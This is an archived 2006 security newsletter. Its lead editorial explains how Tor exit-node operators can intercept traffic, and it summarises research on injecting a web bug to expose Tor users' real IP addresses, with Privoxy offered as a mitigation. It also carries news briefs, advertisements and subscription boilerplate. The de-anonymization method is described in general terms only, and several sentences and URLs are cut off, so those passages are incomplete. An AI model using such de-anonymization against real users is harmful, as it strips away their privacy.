Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
[ISN] The Onion Router Downside
From: InfoSec News (alertsinfosecnews.org)
Date: Thu Oct 26 2006 - 03:54:23 CDT
PLEASE VISIT OUR SPONSORS, WHO BRING YOU SECURITY UPDATE FOR FREE:
Security Measurement is Vital to Program Success
Making the Case for E-mail Archiving and Litigation Readiness
The Starter PKI Program
=== CONTENTS ===================================================
IN FOCUS: The Onion Router Downside
NEWS AND FEATURES
- Microsoft Releases WPA2 Support, Modifies Wi-Fi Client Behavior
- Zero-Day Vulnerability in PowerPoint
- Microsoft Re-releases Security Bulletin for Windows 2000
- McAfee Acquires Onigma, Introduces Data Loss Prevention Solution
- Recent Security Vulnerabilities
GIVE AND TAKE
- Security Matters Blog: Bitter News for VM Users, There's a Rootkit
Made Just for You
- FAQ: Command Lists All Members of an AD Group
- From the Forum: Making the C Drive Invisible Yet Readable
- Know Your IT Security Contest
- Make Your Mark on the IT Community!
- Comprehensive Protection for Endpoints at Work and at Home
- Wanted: Your Reviews of Products
RESOURCES AND EVENTS
FEATURED WHITE PAPER
=== SPONSOR: Solutionary =======================================
Security Measurement is Vital to Program Success
Security managers face challenges technically and organizationally
in gaining program support and focus. Effective security measurement
can help ingrain the issue into the performance management process and
culture of the organization. Read this white paper.
=== IN FOCUS: The Onion Router Downside ========================
by Mark Joseph Edwards, News Editor, mark at ntsecurity / net
Two weeks ago, I wrote about a portable Web browser, Torpark, that's
designed to keep you relatively anonymous as you browse. Torpark is
based on the Mozilla Firefox source code, and you might recall that one
of the big advantages of using Torpark is that it comes with The Onion
Router (Tor) built in. So you don't need to install and configure that
separately. If you missed that editorial, you can read it at the URL
Tor is a client and server SOCKS-based proxy that's designed to route
traffic through a series of anonymous servers, the number of which
varies depending on how you configure the Tor client. Anyone can run a
Tor client or server without having to reveal anything to the outside
world except an IP address, and that address is made known only to the
first Tor server your traffic passes through.
Traffic is encrypted by Tor along the route, and Tor routers know only
about the hops of the routers immediately before and after them. Tor
handles its own traffic encryption, so in theory, Tor server operators
shouldn't be able to snoop on the contents of your network traffic.
The exception is the Tor server operator of the exit router--the last
hop along your traffic's route through Tor servers. Other servers on
the Internet don't understand Tor encryption, so obviously they can't
receive and process traffic that originates from a Tor network.
Therefore the traffic must be decrypted before being passed on to its
final destination. And therein resides Tor's inherent weakness. You
must trust an unknown Tor server operator to not snoop on your traffic
as it exits the Tor network. Inevitably, some Tor server operators do
snoop on traffic. That's why I said that Tor provides "relative"
anonymity. It protects your actual IP address but not the nature of
what you're doing on the Internet.
Anyone that can see your Internet traffic can also manipulate it. This
certainly holds true for Tor exit server operators. This presents
another danger of using Tor. In one of many possible scenarios, someone
could monitor for traffic destined for port 80, typically used for Web
traffic, and then manipulate Web pages, cookies, headers, and so on in
just about any way you can image. Now someone has proven just how easy
it is to use this weakness to discover your real IP address, which in
effect destroys your anonymity and thus defeats the purpose of using
"Practical Onion Hacking, Finding the real address of Tor clients" (at
the URL below), is a white paper produced by the FortConsult Security
Research Team and published on the Packet Storm Security Web site. The
paper shows, step by step, how the researchers were able to use readily
available scripts and software packages to inject a "Web bug" into Web
traffic. The Web bug is a typical cookie designed and used in
When Tor is used directly (i.e., without a go-between, which I'll
explain in a moment), either of those two technologies will reveal the
cookie and thus the real IP address of the user.
the address can be placed in a cookie that can be read by a Web server.
Flash doesn't understand the SOCKS protocol at all, so if a Flash
object requires network connectivity for whatever reason, it completely
bypasses the Tor network.
As I suggested earlier, there is a way to eliminate both of these
weaknesses--by using a standard proxy server as a go-between between
client applications and the Tor client. One such proxy server is
content. Privoxy understands the SOCKS protocol, so it can be
configured to send traffic through Tor. With Privoxy as a go-between,
even Flash would run its connectivity needs through Tor.
If you're interested in Tor's weaknesses, or even in how easy it is to
manipulate network traffic, then be sure to read the white paper.
A note from Mark Minasi: I wanted to pass along some information about
a show that I'm not speaking at but that looks like a good deal. It's a
$129, one-day interoperability road show from Penton, the folks who put
out this newsletter.
If you're like most folks, "interop" isn't just a buzzword, it's a
daily headache. If we all used the same operating system, directory
service, and database engines, then life would be a lot easier, but
most of us can't. Worse yet, interop info can be hard to come by,
because no vendor's all that excited about helping you use any products
In response to that, Penton's put together a show with four tracks,
each geared to a solution. One features Dustin Puryear talking about
making Windows, Linux, and Unix work together. The second offers a day
of Active Directory expert Gil Kirkpatrick on integrating AD with other
LDAP directory services. At the same time, database techie Randy Dyess
explains how to solve data interoperability problems by making
different databases replicate amongst one another and produce
integrated reports, as well as how to integrate dissimilar relational
database engines. Last but not least, popular Windows IT Pro veteran
author Mike Otey tackles what may be the single best new IT technology
of the past few years--virtualization.
Tech X World is coming to Chicago, Dallas, and San Francisco in the
next week, and you can find out more at
=== SPONSOR: Symantec ==========================================
Making the Case for E-mail Archiving and Litigation Readiness
Are your messages easily accessible, yet secure, in the case of an
e-discovery request? With the phenomenal email volume growth, and
increasing costs when companies fail to comply, you can't afford to
lose an email. Download this free whitepaper today and implement a
strong email retention and management system today!
=== SECURITY NEWS AND FEATURES =================================
Microsoft Releases WPA2 Support, Modifies Wi-Fi Client Behavior
Microsoft announced the release of a security update for Windows XP
SP2 that introduces support for WPA2 and changes the behavior of
wireless clients to be more secure.
Zero-Day Vulnerability in PowerPoint
A zero-day vulnerability has been discovered in Microsoft
PowerPoint. According to available information, the vulnerability can
potentially be exploited to execute arbitrary code on an affected
system if a user opens an infected PowerPoint file. Proof-of-concept
code has been published to demonstrate the problem. Microsoft is aware
of the problem and is investigating the matter, however no patch is
available at this time.
Microsoft Re-releases Security Bulletin for Windows 2000
Late last week, Microsoft re-released Security Bulletin MS06-061
(Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code
Execution) to correct a problem with the previous update, which didn't
correctly set the kill bit for Microsoft XML Parser 2.6.
McAfee Acquires Onigma, Introduces Data Loss Prevention Solution
McAfee announced that it acquired data protection solutions provider
Onigma. The acquisition brings McAfee the ability to offer solutions to
monitor and report on confidential data as well as to prevent its loss.
Recent Security Vulnerabilities
If you subscribe to this newsletter, you also receive Security
Alerts, which inform you about recently discovered security
vulnerabilities. You can also find information about these
=== SPONSOR: Thawte ============================================
The Starter PKI Program
Securing multiple domains or host names? Learn how the Starter PKI
program can save time and reduce costs, and provide you with a multiple
digital certificate account.
=== GIVE AND TAKE ==============================================
SECURITY MATTERS Blog: Bitter News for VM Users, There's a Rootkit Made
Just for You
by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=3D935:7EB890
With every innovation comes a setback, sometimes vitriolic in nature.
Virtual machine (VM) technology is a good case in point. Read this blog
article to discover how intruders are bound to invade VMs, by hook or
FAQ: Command Lists All Members of an AD Group
by John Savill, http://list.windowsitpro.com/t?ctl=3D932:7EB890
Q: How can I use a command to list all the members of an Active
Directory (AD) group?
Find the answer at
FROM THE FORUM: Making the C Drive Invisible Yet Readable
A forum participant wants to know how to make the C drive invisible
yet still readable. He wants the drive hidden from users but wants them
to be able to access all the programs on the system. Join the
KNOW YOUR IT SECURITY Contest
Share your security-related tips, comments, or solutions in 1000
words or less, and you could be one of 13 lucky winners of a Zune media
player. Tell us how you do patch management, share a security script,
or write about a security article you've read or a Webcast you've
viewed. Submit your entry between now and December 13. We'll select the
13 best entries, and the winners will receive a Zune media player--
plus, we'll publish the winning entries in the Windows IT Security
newsletter. Email your contributions to tipswinitsecwindowsitpro.com.
Prizes are courtesy of Microsoft Learning Paths for Security:
MAKE YOUR MARK ON THE IT COMMUNITY!
Nominate yourself or a peer to become an "IT Pro of the Month."
Winners will receive over $600 in IT resources and be featured in
Windows IT Pro magazine and the TechNet Flash email newsletter. It's
easy to enter--accepting October nominations for a limited time! Submit
your nomination today:
=== PRODUCTS ===================================================
by Renee Munshi, productswindowsitpro.com
Comprehensive Protection for Endpoints at Work and at Home
eEye Digital Security released version 2.5 of Blink Professional,
its host-based firewall, intrusion prevention, and anti-malware
solution, and added portable-storage?device control, application
control, and "dynamic" control that allows different policies to be in
effect depending on whether the client is physically connected to the
network or is outside the network perimeter. A new offering, Blink
Personal, which includes most of the functionality of Blink Pro, is
available for free to home users, who are invited to participate in a
Neighborhood Watch program that sends "attack data" anonymously and
automatically from Blink Pro to the eEye Research Lab. The data will
help eEye continue to improve its products' attack detection and
prevention capabilities. For more information, go to
WANTED: your reviews of products you've tested and used in
production. Send your experiences and ratings of products to
whatshotwindowsitpro.com and get a Best Buy gift certificate.
=== RESOURCES AND EVENTS =======================================
For more security-related resources, visit
In an environment where there is no one true OS, users must access a
variety of applications across several platforms. Get the tools you
need to analyze and improve how you manage access across Windows
Terminal Services, UNIX and Linux X, Windows, legacy telnet, and even
SSH. TechX World events start October 24--register today!
How will compliance regulations affect your IT infrastructure? Help
design your retention and retrieval, privacy and security policies to
make sure that your organization is compliant. Download the free eBook
Did you know that 75% of corporate intellectual property resides in
email? With security concerns from viruses and malware, increasing
amounts of spam, and ever-stronger performance demands for availability
and recovery, email systems have become the most important business
application. Join us for this free Web seminar and learn a holistic
approach to managing the challenges of security, availability and
control. Live Event: Thursday, November 16
How do you manage vulnerabilities? If you depend on vulnerability
assessments to determine the state of your IT security systems, you
can't miss this Web seminar. Special research from Gartner indicates
that deeper penetration is needed to augment your vulnerability
management processes. Learn more today!
Take the necessary steps for application management, from conversion of
legacy applications to MSI to customizing applications to fit corporate
standards. Don't overlook an important component of an OS migration--
join us for the free on-demand Web seminar.
=== FEATURED WHITE PAPER =======================================
Help your small- or medium-sized business protect one of its most
valuable assets--business information. Easily store, manage, protect
and share information with hardware designed with the needs of your
business in mind. Manage IT without the large staff and extensive
training--learn how today!
Special Offer: Download any white paper from Windows IT Pro before
October 31 and enter to win a Casio Exilim Card Camera! The more you
download, the more chances to win! Visit
http://list.windowsitpro.com/t?ctl=3D937:7EB890 for a full listing of white
papers and contest rules.
=== ANNOUNCEMENTS ==============================================
Invitation for VIP Access
Become a VIP Monthly Pass subscriber and get instant online access
to every article published in our network. You'll get full Web access
to Windows IT Pro, SQL Server Magazine, and the Exchange and Outlook
Administrator, Windows Scripting Solutions, and Windows IT Security
newsletters--that's more than 26,000 articles at your fingertips. Sign
up now for only $29.95 per month:
Get $40 off on Windows IT Pro
Subscribe to Windows IT Pro today and SAVE up to $40! Along with
your 12 issues, you'll get FREE access to the entire Windows IT Pro
online article archive, which houses more than 9,000 helpful IT
articles. This is a limited-time offer, so order now:
Security UDPATE is brought to you by the Windows IT Pro Web site's
Security page (first URL below) and the Windows IT Security newsletter
(subscribe at the second URL below).
Subscribe to Security UPDATE at
Be sure to add Security_UPDATElist.windowsitpro.com
to your antispam software's list of allowed senders.
To contact us:
About Security UPDATE content -- letterswindowsitpro.com
About technical questions -- http://list.windowsitpro.com/t?ctl=3D939:7EB890
About your product news -- productswindowsitpro.com
About your subscription -- windowsitproupdatewindowsitpro.com
About sponsoring Security UPDATE -- salesoppswindowsitpro.com
Windows IT Pro, a division of Penton Media, Inc.
221 East 29th Street, Loveland, CO 80538
Attention: Customer Service Department
Copyright 2006, Penton Media, Inc. All rights reserved.
Visit the InfoSec News store!